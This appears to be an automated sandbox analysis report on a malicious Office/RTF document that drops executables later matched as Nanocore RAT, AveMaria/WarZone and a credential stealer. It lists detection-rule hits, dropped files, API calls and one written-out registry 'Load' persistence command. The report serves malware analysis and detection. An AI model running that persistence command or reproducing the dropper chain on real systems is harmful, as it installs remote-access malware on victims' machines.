Source: 00000024.00000002.2366711358.0000000000760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000024.00000002.2367125830.0000000000C30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: AveMaria_WarZone Author: unknown
Source: 00000024.00000002.2373841874.00000000034F9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000024.00000002.2366178722.0000000000580000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000024.00000002.2365752847.00000000003C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000024.00000002.2368726413.0000000002502000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000024.00000002.2374416119.0000000003777000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing when opening. 0 Words: 19 N@m 13 ;a 10096 G) FI G) ,, ' I :j I ;; ] " mtub
Source: Screenshot number: 12	Screenshot OCR: Enable Editing when opening. ii: ^ a S

Found suspicious RTF objects

Show sources

Source: abdtfhgXgdghgh.ScT

Static RTF information: Object: 0 Offset: 00000961h abdtfhgXgdghgh.ScT

Microsoft Office creates scripting files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT

Jump to behavior

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\microA[1].exe

Jump to dropped file

Powershell drops PE file

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\microA.exe

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\microA.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\microA.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\ProgramData\images.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\ProgramData\images.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\reg.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\reg.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\images.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\images.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BFA3D5 UserRegisterWowHandlers,NtVdmControl,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BC53D2 NtCallbackReturn,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03C0E2BA GetCurrentThread,NtOpenThreadToken,NtQueryInformationToken,CloseHandle,GetCurrentProcessId,ProcessIdToSessionId,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,NtRaiseHardError,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03C011B0 RecordShutdownReason,NtOpenThreadToken,NtOpenThreadToken,NtOpenThreadToken,NtOpenProcessToken,NtClose,NtClose,RtlAllocateHeap,CsrAllocateCaptureBuffer,RtlAllocateHeap,CsrAllocateMessagePointer,CsrAllocateMessagePointer,CsrAllocateMessagePointer,CsrAllocateMessagePointer,CsrAllocateMessagePointer,CsrClientCallServer,CsrFreeCaptureBuffer,RtlFreeHeap,RtlFreeHeap,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BF912F WaitForInputIdle,NtQueryInformationProcess,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BDE124 MultiByteToWideChar,NtCallbackReturn,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BB810B NtCallbackReturn,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BFB107 RtlOpenCurrentUser,RtlInitUnicodeString,RtlInitUnicodeString,NtOpenKey,NtOpenKey,RtlInitUnicodeString,NtQueryValueKey,NtClose,NtClose,NtClose,RtlInitUnicodeString,NtOpenKey,NtClose,NtClose,RtlInitUnicodeString,NtQueryValueKey,wcstoul,RtlInitUnicodeString,NtCreateKey,RtlInitUnicodeString,NtSetValueKey,NtClose,RtlInitUnicodeString,NtDeleteValueKey,NtClose,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BC20B0 NtCallbackReturn,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03C010BF CreateThread,GetExitCodeThread,NtClose,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BDE019 RtlFreeHeap,NtCallbackReturn,RtlAllocateHeap,RtlAllocateHeap,memcpy,RtlAllocateHeap,RtlAllocateHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BC7044 PeekMessageA,NtYieldExecution,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BDB7F5 NtCallbackReturn,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BF47EB NtClose,RtlInitUnicodeString,NtQueryValueKey,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BCA7DE NtCallbackReturn,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BC9719 NtCallbackReturn,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BC36BC NtCallbackReturn,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BBB6FA FreeLibrary,FreeLibrary,RtlDeleteCriticalSection,RtlDeleteCriticalSection,RtlDeleteCriticalSection,RtlDeleteCriticalSection,RtlDeleteCriticalSection,RtlDeleteCriticalSection,RtlDeleteCriticalSection,RtlDeleteCriticalSection,RtlDeleteCriticalSection,EntryPoint,DisableThreadLibraryCalls,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,NtQuerySystemInformation,GetModuleHandleW,FindResourceExA,FindResourceExW,LoadStringBaseExW,LoadResource,SizeofResource,RegisterWaitForInputIdle,GdiDllInitialize,QueryActCtxSettingsW,FreeLibrary,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BBA6E0 NtCallbackReturn,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BDE66F NtCallbackReturn,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BFA666 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlInitUnicodeString,RtlUnicodeStringToInteger,LoadLibraryW,FreeLibrary,GetProcAddress,NtClose,LoadLibraryW,GetProcAddress,GetModuleFileNameW,FreeLibrary,CreateFileW,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BC55AA NtCallbackReturn,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BF95FC NtClose,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BB85E8 NtCallbackReturn,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BC05D2 PeekMessageW,NtYieldExecution,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03C1A540 NtQuerySystemInformation,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BDE53B NtCallbackReturn,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03C00551 NtQueryInformationProcess,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BF9503 SetUserObjectSecurity,NtSetSecurityObject,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BC04B6 NtOpenDirectoryObject,NtClose,RtlInitUnicodeString,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03C174E6 _wcsicmp,wcsncpy_s,wcsncpy_s,memset,CreateProcessW,NtClose,NtClose,NtClose,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BC548F NtCallbackReturn,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BF94CD GetUserObjectSecurity,NtQuerySecurityObject,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03C15472 _UserTestTokenForInteractive,NtQueryInformationToken,NtQueryInformationToken,RtlAllocateHeap,NtQueryInformationToken,RtlFreeHeap,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BFB455 wcstoul,GetPrivateProfileStringW,WritePrivateProfileStringW,wcstoul,RtlInitUnicodeString,RtlInitUnicodeString,NtOpenKey,NtOpenKey,RtlInitUnicodeString,NtQueryValueKey,NtQueryValueKey,RtlInitUnicodeString,NtQueryValueKey,RtlInitUnicodeString,NtQueryValueKey,wcstol,RtlInitUnicodeString,NtOpenKey,RtlInitUnicodeString,NtQueryValueKey,NtClose,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BFABCC RtlInitUnicodeString,NtClose,RtlInitUnicodeString,NtOpenKey,NtEnumerateKey,RtlUnicodeStringToInteger,RtlInitUnicodeString,NtOpenKey,RtlInitUnicodeString,NtQueryValueKey,NtClose,lstrcmpiW,NtEnumerateKey,NtClose,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BB8B52 NtCallbackReturn,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BB8AAB NtCallbackReturn,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BC7AD0 RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,NtOpenKey,NtQueryValueKey,NtClose,RtlNtStatusToDosError,SetLastError,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BDBA23 NtCallbackReturn,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BBAA6C memset,LoadLibraryExW,WideCharToMultiByte,GetProcAddress,FreeLibrary,NtCallbackReturn,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BC2A4C NtCallbackReturn,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BCE9BC NtCallbackReturn,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03C009C4 GetCurrentThread,NtOpenThreadToken,GetCurrentProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,RtlAllocateHeap,NtQueryInformationToken,RtlFreeHeap,NtClose,
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BB99F4 NtCallbackReturn,RtlReleaseActivationContext,

Source: C:\Users\user\AppData\Local\Temp\images.exe

Code function: 25_2_03C01533 ExitWindowsEx,SetLastError,

Source: C:\Users\user\AppData\Local\Temp\images.exe

File created: C:\Windows\System32\rfxvmt.dll

Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 10_2_00402008
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 10_2_00400DA7
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 10_2_004020BA
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 10_2_00401621
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 10_2_00400F1B
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 10_2_0040171C
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 10_2_004047C8
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 10_2_004047D8
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 10_2_01E21A1A
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 10_2_01E27B88
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 10_2_01E27B77
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 10_2_01E27B41
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 10_2_01E21A7D
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 10_2_04E6417C
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 11_2_00232008
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 11_2_00230DBB
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 11_2_002320BA
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 11_2_00231621
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 11_2_00230F1B
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 11_2_0023171C
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 11_2_002347C8
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 11_2_002347D8
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 11_2_00501A1A
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 11_2_00501A7D
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 11_2_00507B77
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 11_2_00507B88
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 11_2_01FE417C
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 12_2_00262008
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 12_2_00260DBB
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 12_2_00262329
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 12_2_002620BA
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 12_2_00261621
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 12_2_0026171C
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 12_2_00260F1B
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 12_2_002647C8
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 12_2_002647D8
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 12_2_00621A1A
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 12_2_00621A7D
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 12_2_00627B77
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 12_2_00627B88
Source: C:\Users\user\AppData\Roaming\microA.exe	Code function: 12_2_045B4197
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_00413279
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 16_2_0041DEAA
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_00413279
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 17_2_0041DEAA
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_00413279
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: 18_2_0041DEAA
Source: C:\ProgramData\images.exe	Code function: 20_2_002D2008
Source: C:\ProgramData\images.exe	Code function: 20_2_002D0DBB
Source: C:\ProgramData\images.exe	Code function: 20_2_002D20BA
Source: C:\ProgramData\images.exe	Code function: 20_2_002D1621
Source: C:\ProgramData\images.exe	Code function: 20_2_002D171C
Source: C:\ProgramData\images.exe	Code function: 20_2_002D0F1B
Source: C:\ProgramData\images.exe	Code function: 20_2_002D47C8
Source: C:\ProgramData\images.exe	Code function: 20_2_002D47D8
Source: C:\ProgramData\images.exe	Code function: 20_2_004D1A1A
Source: C:\ProgramData\images.exe	Code function: 20_2_004D1A7D
Source: C:\ProgramData\images.exe	Code function: 20_2_004D7B77
Source: C:\ProgramData\images.exe	Code function: 20_2_004D7B88
Source: C:\ProgramData\images.exe	Code function: 20_2_008B417C
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_00413279
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_0041DEAA
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BF72CE
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BD9236
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BD0219
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BDD200
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BC914C
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BCF6BA
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BD3643
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03C0A5A4
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BD89A9
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: 25_2_03BB69ED

Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: String function: 004036F7 appears 216 times
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: String function: 0040357C appears 93 times
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: String function: 004034D1 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: String function: 00411E88 appears 147 times
Source: C:\Users\user\AppData\Local\Temp\microA.exe	Code function: String function: 0040BC0D appears 42 times
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: String function: 004036F7 appears 72 times
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: String function: 03BB6125 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: String function: 0040357C appears 31 times
Source: C:\Users\user\AppData\Local\Temp\images.exe	Code function: String function: 00411E88 appears 49 times

Source: microA[1].exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: microA.exe.3.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: microA.exe.10.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: microA.exe.11.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: microA.exe.12.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: images.exe.16.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: unknown

Driver loaded: C:\Windows\System32\drivers\rdpdr.sys

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'

Source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.2.microA.exe.3369c78.12.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.microA.exe.33be930.10.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.microA.exe.34da100.12.unpack, type: UNPACKEDPE	Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.2.microA.exe.2095f04.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.2100943704.0000000000360000.00000004.00000020.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000002.2366916666.00000000007D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000024.00000002.2366916666.00000000007D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000002.2366832596.00000000007B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000024.00000002.2366832596.00000000007B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
